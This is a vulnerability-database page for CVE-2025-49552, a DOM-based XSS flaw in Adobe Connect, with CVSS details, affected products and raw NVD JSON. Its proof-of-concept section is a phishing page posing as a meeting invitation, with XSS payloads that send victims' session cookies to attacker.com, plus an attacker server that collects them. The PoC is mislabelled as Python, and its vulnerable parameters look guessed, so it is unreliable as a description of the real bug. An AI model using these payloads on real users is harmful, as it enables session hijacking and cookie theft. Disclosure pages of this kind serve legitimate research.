Security Vulnerability Report
中文
CVE-2025-49552 CVSS 8.1 HIGH

CVE-2025-49552

Published: 2025-10-14 22:15:37
Last Modified: 2026-04-28 15:39:37
Source: [email protected]

Description

Adobe Connect versions 12.9 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a high-privileged attacker to execute malicious scripts in a victim's browser. Exploitation of this issue requires user interaction in that a victim must navigate to a crafted web page. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Scope is changed.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:connect:*:*:*:*:*:-:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Connect <= 12.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-49552 PoC: Adobe Connect DOM-based XSS --> <!-- This PoC demonstrates a crafted URL that exploits the DOM-based XSS vulnerability --> <!-- Malicious URL example that an attacker would craft: --> <!-- https://connect.example.com/[vulnerable_path]?param=<img src=x onerror=alert(document.cookie)> --> <!-- Attacker's HTML page that redirects victim to the malicious URL: --> <html> <head> <title>Important Meeting Invitation</title> </head> <body> <h1>Click here to join the meeting</h1> <!-- The crafted URL below contains XSS payload in a parameter that is unsafely processed by Adobe Connect's client-side JavaScript --> <a href="https://connect.example.com/meeting/join?meetingId=<img%20src=x%20onerror=this.src='https://attacker.com/steal?c='+document.cookie>" id="malicious-link"> Join Meeting Now </a> <script> // Optional: Auto-redirect the victim to the malicious URL // window.location.href = document.getElementById('malicious-link').href; // More sophisticated payload to steal session tokens var payload = "javascript:void(0)"; var xssUrl = "https://connect.example.com/meeting/join?redirect=" + encodeURIComponent("<svg onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>"); console.log("Crafted XSS URL: " + xssUrl); </script> </body> </html> <!-- Server-side exfiltration endpoint (attacker's server) - Node.js example --> /* const express = require('express'); const app = express(); app.get('/exfil', (req, res) => { const stolenData = Buffer.from(req.query.data, 'base64').toString(); console.log('Stolen session data:', stolenData); // Save to database or use for session hijacking res.sendStatus(200); }); app.listen(8080); */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49552", "sourceIdentifier": "[email protected]", "published": "2025-10-14T22:15:37.153", "lastModified": "2026-04-28T15:39:36.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Connect versions 12.9 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a high-privileged attacker to execute malicious scripts in a victim's browser. Exploitation of this issue requires user interaction in that a victim must navigate to a crafted web page. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:connect:*:*:*:*:*:-:*:*", "versionEndExcluding": "12.10", "matchCriteriaId": "FE8202C5-1060-4C83-B5D6-ECB75864C63F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/connect/apsb25-70.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.